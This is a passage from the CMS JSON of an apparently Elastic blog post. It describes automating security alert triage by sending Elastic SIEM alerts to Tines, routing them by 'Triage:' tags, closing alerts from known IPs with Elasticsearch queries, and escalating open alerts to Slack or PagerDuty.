view","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs218c4559d05236a1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe easiest way to send your alerts to Tines is to configure and use the built-in \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/tines-action-type.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eTines connector\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in Elastic, which sends your alerts to a Tines story for processing.\u0026nbsp;\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u0026nbsp;The other option is to use the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/webhook-action-type.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eWebhook\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e connector, which is very flexible because it \u0026nbsp; allows you to send a portion of the alert or the entire contents of the alert in an ndjson format to a listening Webhook. We have been using Tines internally at Elastic since before the Tines connector existed, so most of our automations still use the Webhook connector. You can send the alerts one at a time to the Webhook or all together in a single ndjson. If you are using custom scripts, you can use this connector to receive and process the alerts, and it also works with the Tines Webhook action. To send the full contents of the alert to a Webhook, you will need to configure a Webhook connector to use a POST action with the content type set to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eapplication/x-ndjson; charset=utf-8\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs87ea56244148f9c4"}}},{"image":{"image":{"uid":"bltb47765d21564055d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:41:00.418Z","created_by":"bltb6c155cd84fc0c1a","file_size":"87119","filename":"3.png","parent_uid":null,"tags":[],"title":"3.png","updated_at":"2024-05-29T15:41:00.418Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.270Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb47765d21564055d/66574c8ce429497d45a78ec7/3.png"},"_metadata":{"uid":"csd35a3a81ba7f50a7"},"caption_l10n":"Webhook connector configuration settings","alt_text_l10n":"Webhook connector configuration settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs57a804b6bf31e1bc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen adding the actions to your rules, select the configured Webhook connector and use the following mustache syntax in your configuration to send the full alert as an ndjson to the Webhook.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2f828a6abe0a770d"}}},{"image":{"image":{"uid":"bltbfd2244a13e31cfc","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:46:59.133Z","created_by":"bltb6c155cd84fc0c1a","file_size":"53674","filename":"4.png","parent_uid":null,"tags":[],"title":"4.png","updated_at":"2024-05-29T15:46:59.133Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.098Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbfd2244a13e31cfc/66574df31f92d1c814280d23/4.png"},"_metadata":{"uid":"cs6da909786846a613"},"caption_l10n":"Alert Action to Webhook configuration","alt_text_l10n":"Alert Action to Webhook configuration","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-medium: 50%"}}},{"title_text":{"title_text":[{"title_l10n":"Using tags to route the automation","_metadata":{"uid":"cs413ed53be735be02"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen building these automations, we started by building a custom automation path for each alert individually, but we found very quickly that this doesn’t scale. Our solution to this was to instead use custom tags in our detection rules to route the rule to the appropriate triage path. We are sending the full alert to Tines, which includes the tags as an array in the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esignal.rule.tags\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e field. We decided to use a naming convention of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eTriage:{option}\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to describe which automated checks will be taken on a rule. Detection rules can have multiple different tags.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfa21693dc5a9bd8b"}}},{"image":{"image":{"uid":"bltdc002f0fb1f8b370","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:47:24.791Z","created_by":"bltb6c155cd84fc0c1a","file_size":"52500","filename":"5.png","parent_uid":null,"tags":[],"title":"5.png","updated_at":"2024-05-29T15:47:24.791Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.187Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdc002f0fb1f8b370/66574e0c0d634752f87a08ea/5.png"},"_metadata":{"uid":"cscad02374fa0a0c43"},"caption_l10n":"Triage tags list","alt_text_l10n":"Triage tags list","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-medium: 50%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs523358bb405815a3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHere is a description of the automated triage tags we are using:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: All \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewill route the alert through the Asset, PMFA, and workstation automated triage paths, and if any queries return true the alert is closed. If none of the queries return true the alert is escalated.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: Asset\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e will check various index patterns to determine if the source IP is coming from an asset that Elastic owns or manages in some way. This includes our internal \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-build-a-cybersecurity-asset-management-solution-on-the-elastic-stack\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAsset Database that we store in Elastic\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, internal network zones, our \u003c/span\u003e\u003ca href=\"https://ips.cld.elstc.co/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud public IPs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, CI/CD systems, and public IP space of authorized third-party systems such as Okta or Tines.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: PMFA \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewill look at our Okta audit logs for a successful authentication using phishing-resistant MFA such as a passkey using Okta Verify or Windows Hello. We use the \u003c/span\u003e\u003ca href=\"https://docs.elastic.co/en/integrations/okta\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta integration\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to collect our Okta audit logs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: Workstation\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e will check our nginx proxy logs for successful connections from Elastic Defend to our fleet server from the IP address. Elastic is a distributed company and employees can work from anywhere in the world, but their Elastic Defend agents are connecting regularly, so we can usually see that an Elastic employee’s managed workstation was connected from the same IP that generated the alert.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: New Employee \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewill check our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-build-a-cybersecurity-asset-management-solution-on-the-elastic-stack\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003easset database\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which contains a daily report of all employees exported from our HR system to see if the user is a new employee. This is important for certain categories of detection rules such as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/detecting-account-compromise-ueba-detection-packages\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSlack UEBA\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e that usually go off when a new employee is configuring their accounts but rarely alert for existing employees.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: 1h \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewill instruct Tines to pause the alert triage for 1 hour before doing the rest of the triage actions. This can be useful for events such as a user configuring a brand new workstation where the alert can be closed if the workstation is properly enrolled and registered with our endpoint management systems that install Elastic Defend.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: 24h \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewill instruct Tines to pause the alert triage for a full 24 hours before processing. This may be required for some triage paths where the data is only updated daily, such as parts of our asset database that collect a daily inventory of all computers, users, and cloud accounts.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTriage: Custom\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e is for any custom triage paths that may be required for an alert. A good example of this is a scenario where we provided a third party such as Okta with a highly privileged API key used to create or disable accounts in Azure and we want to be alerted if that API token is ever used from an IP address that doesn’t belong to \u003c/span\u003e\u003ca href=\"https://s3.amazonaws.com/okta-ip-ranges/ip_ranges.json\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. This alert and automated triage lets us “Trust but Verify” in case Okta’s storage of our API key is compromised and used outside of Okta IP spaces.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Building blocks for the automation","_metadata":{"uid":"csdd5e3d7a25f6a602"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow that we are sending the full alert as a JSON to our SOAR, we can send it through our triage path and then on to other sources such as Slack or Pagerduty. In Tines, there are seven different types of \u003c/span\u003e\u003ca href=\"https://www.tines.com/docs/actions\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eactions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e that can be used to build your stories:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThe Webhook\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eaction \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ewill emit events it receives through Webhooks (HTTP callbacks). This is the primary method for sending events to a story in Tines.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThe Send Email\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eaction \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003esends emails to recipients specified in the action options.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThe Receive Email action\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, formally known as the IMAP Action, emits Events when it detects new emails on an IMAP server or when emails are sent to a uniquely generated email address.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEvent Transformation action\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e has several modes that modify the contents of received events. These actions are extremely flexible and powerful.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThe HTTP Request action\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e sends HTTP requests using a variety of methods to a specified URL.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThe Trigger\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eaction \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ecompares the contents of a field from an incoming Event with predefined rules, and when the rules match, an event emit is triggered. This can be thought of as an “If Then” logic action.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThe Send to Story action\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e sends events to another Tines story (the sub-story). After the sub-story has completed its action, the Send to Story action will emit an event. Send to Story actions are similar to functions or libraries in code where you want to re-use actions in multiple places.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsing these actions, we can build automations that \u003c/span\u003e\u003ca href=\"https://www.tines.com/case-studies/elastic\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003esave us thousands of hours of work per month\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eExample simplified automated triage workflow:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscfb267a94cdc3b09"}}},{"image":{"image":{"uid":"blt0a71ceeea0256272","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:50:01.256Z","created_by":"bltb6c155cd84fc0c1a","file_size":"123578","filename":"6-2.png","parent_uid":null,"tags":[],"title":"6-2.png","updated_at":"2024-05-29T15:50:01.256Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.071Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0a71ceeea0256272/66574ea96bf5e0163daf4dc7/6-2.png"},"_metadata":{"uid":"cse02cf6b365567cef"},"caption_l10n":"Tines triage story","alt_text_l10n":"Tines triage story","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs026d1226022f2d95"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this automation story, we process new alerts as they come into the Webhook, use an event transform action to parse the ndjson into an object that we can more easily reference, and then use trigger actions to determine which triage paths the alert should go down.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMost of the HTTP request actions are queries to the Elasticsearch \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-your-data.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e API. In these follow-on queries, we use fields from the original alert such as the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e or the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003euser.email\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to triage the alerts.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTines comes with hundreds of prebuilt action templates, including several for interacting with Elasticsearch. You can use the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e’Query an Elasticsearch index for all records’\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e template and then modify the payload to add your query using the source IP from the alert. Because most of the queries are looking for \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eany\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eevents from a specific \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. I recommend adding the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e”size”: 1\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e option to your queries to improve the speed and performance. This will return if Elasticsearch finds a result matching the source.ip within the last 4 hours.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7fb968e27bc5139c"}}},{"code":{"code":"{\n \"size\": 1,\n \"query\": {\n \"bool\": {\n \"must\": [],\n \"filter\": [\n {\n \"bool\": {\n \"should\": [\n {\n \"match_phrase\": {\n \"source.ip\": \"\u003c\u003cextract_source_ip.source_ip\u003e\u003e\"\n }\n }\n ]\n }\n },\n {\n \"range\": {\n \"@timestamp\": {\n \"format\": \"strict_date_optional_time\",\n \"gte\": \"now-4h\",\n \"lte\": \"now\"\n }\n }\n }\n ],\n \"should\": [],\n \"must_not\": []\n }\n }\n}","_metadata":{"uid":"csdce5b93d63014d22"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs80ae16db4caaa462"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFollowing each query action, we have a trigger action to check if any results were found. If the number of hits is greater than zero, we use the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/signals-api-overview.html#_set_alert_status\"\u003e\u003cspan style='font-size: 12pt;'\u003eSignals API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to close the alert. If there are zero results, we continue processing and go on to the next action. If all actions return zero results, we then send the alert to Slack to notify the analysts for investigation.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese are the example settings for a Trigger action that checks for any results to a query:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs957f8a9471c0bf83"}}},{"image":{"image":{"uid":"blte0420974dec0815a","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:48:21.635Z","created_by":"bltb6c155cd84fc0c1a","file_size":"15049","filename":"7.png","parent_uid":null,"tags":[],"title":"7.png","updated_at":"2024-05-29T15:48:21.635Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.255Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte0420974dec0815a/66574e453a936490ec8c9602/7.png"},"_metadata":{"uid":"cs8a08bb1005e59a19"},"caption_l10n":"Trigger action settings","alt_text_l10n":"Trigger action settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb0cc3e4f10c4a5db"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy using the logic of running an Elasticsearch query and then closing the alert if there are any results, we can chain several of these actions together to build comprehensive stories that close alerts coming from known good IP addresses.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Managed workstation triage example","_metadata":{"uid":"cse9eebfedcd44737b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the example story branch below, we are closing any alert that is coming from a workstation or server that we manage. Elastic is a globally distributed company and the majority of our employees work from home, so we have no way of predicting which IP address they will be connecting to the internet from, and in many cases their public IP address can change multiple times per day. Our solution to reliably finding the public IPs of these workstations as they travel around the world is to deploy the Elastic Agent to the nginx proxies that sit in front of our InfoSec infrastructure.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsing this data, we can now identify successful connections through the proxy sending Elastic Agent, Auditbeat, or Endgame traffic to our clusters. All of our cloud server systems have Auditbeat or Elastic Agent installed, so these queries will also detect the public IP addresses of our server systems that regularly use secret keys to run CI/CD and DevOps pipelines.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBelow is the path in the Tines story that we use to check for a managed workstation or server from a source ip. The dashed lines from the Trigger actions is the path that the story flows through if a trigger action does not return true.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0ed1d96233fcf984"}}},{"image":{"image":{"uid":"blt9a7849d48544546d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:48:47.301Z","created_by":"bltb6c155cd84fc0c1a","file_size":"122416","filename":"8.png","parent_uid":null,"tags":[],"title":"8.png","updated_at":"2024-05-29T15:48:47.301Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.284Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9a7849d48544546d/66574e5fcb7d1802e465683a/8.png"},"_metadata":{"uid":"cs711b0b93e1645237"},"caption_l10n":"Workstation story branch","alt_text_l10n":"Workstation story branch","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"The close alert Send to Story","_metadata":{"uid":"cs526e25f1d16e25f3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou may have noticed that each time we want to close the alert we use a Send to Story action in Tines. This action will send the fields we chose to a new story in Tines via a Webhook where we then close and tag the alert. By using a Send to Story, we keep our main story easier to maintain, and we can add additional functionality such as deduplicating by the signal ID so we don’t try to close the same alert twice from two different branches of triage, and using a throttle action so we don’t overwhelm the API if a lot of alerts come in at once.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe also use the Signals API to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/signals-api-overview.html#_apply_alert_tags\"\u003e\u003cspan style='font-size: 12pt;'\u003eupdate the rule tags\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which can be useful for metrics and tracking the status of alerts. All of the alerts that we close with our automated triage workflow are also tagged as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eAutomated Triage\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e so we can track the number of triaged alerts per month and easily see in the SIEM UI if an alert was closed by the automation or by an analyst.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs15296e1017b495d4"}}},{"image":{"image":{"uid":"blt3334d819f041c24a","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:49:09.380Z","created_by":"bltb6c155cd84fc0c1a","file_size":"86030","filename":"9.png","parent_uid":null,"tags":[],"title":"9.png","updated_at":"2024-05-29T15:49:09.380Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.159Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3334d819f041c24a/66574e753adef8fbbced18cb/9.png"},"_metadata":{"uid":"csa6893d24e6f6334b"},"caption_l10n":"Close alert Send to Story","alt_text_l10n":"Close alert Send to Story","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Escalating open alerts to Slack","_metadata":{"uid":"cs6f316ac359f1dd0a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs we are sending the alerts through the various automated triage paths in parallel, we also send the story down a path where we pause processing for 5 minutes. This 5-minute pause allows the other branches time to complete and close any alerts that are found to come from a trusted source IP. After the 5-minute pause, we send a request to the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/signals-api-overview.html#signals-api-overview\"\u003e\u003cspan style='font-size: 12pt;'\u003esignals search API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to check to see if the alert is still open. If the alert is still open, we send a message to our alerts Slack channel to inform the SOC analysts that an alert was not automatically triaged.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csef30051622ca280f"}}},{"image":{"image":{"uid":"blt8c447ffae8327b82","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:49:33.274Z","created_by":"bltb6c155cd84fc0c1a","file_size":"202665","filename":"6.png","parent_uid":null,"tags":[],"title":"6.png","updated_at":"2024-05-29T15:49:33.274Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.200Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8c447ffae8327b82/66574e8d89ebe618400ac4b8/6.png"},"_metadata":{"uid":"csac8aa805e620a965"},"caption_l10n":"Escalating open alerts to Slack","alt_text_l10n":"Escalating open alerts to Slack","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd14268ff305eac0d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you want to add more functionality to this story, Tines makes it easy to create another branch to the story to add additional capabilities. For example, if you have an SLA requiring you to acknowledge critical or high severity alerts in a certain amount of time, you could add logic to wait for an hour and then check to see if the alert has been acknowledged in the Elastic SIEM. If the alert is still open and hasn’t been assigned to anyone, you can escalate by sending an alert to PagerDuty or a second Slack message to a different team.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6f229a846f9d581f"}}},{"image":{"image":{"uid":"blt23c0d72959744366","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:50:33.061Z","created_by":"bltb6c155cd84fc0c1a","file_size":"99862","filename":"10.png","parent_uid":null,"tags":[],"title":"10.png","updated_at":"2024-05-29T15:50:33.061Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.084Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt23c0d72959744366/66574ec98e34d598f9e196de/10.png"},"_metadata":{"uid":"cs304731de2a1093e7"},"caption_l10n":"Escalating to PagerDuty","alt_text_l10n":"Escalating to PagerDuty","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs47fac39ea00b5e40"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTines also includes templates for working with \u003c/span\u003e\u003ca 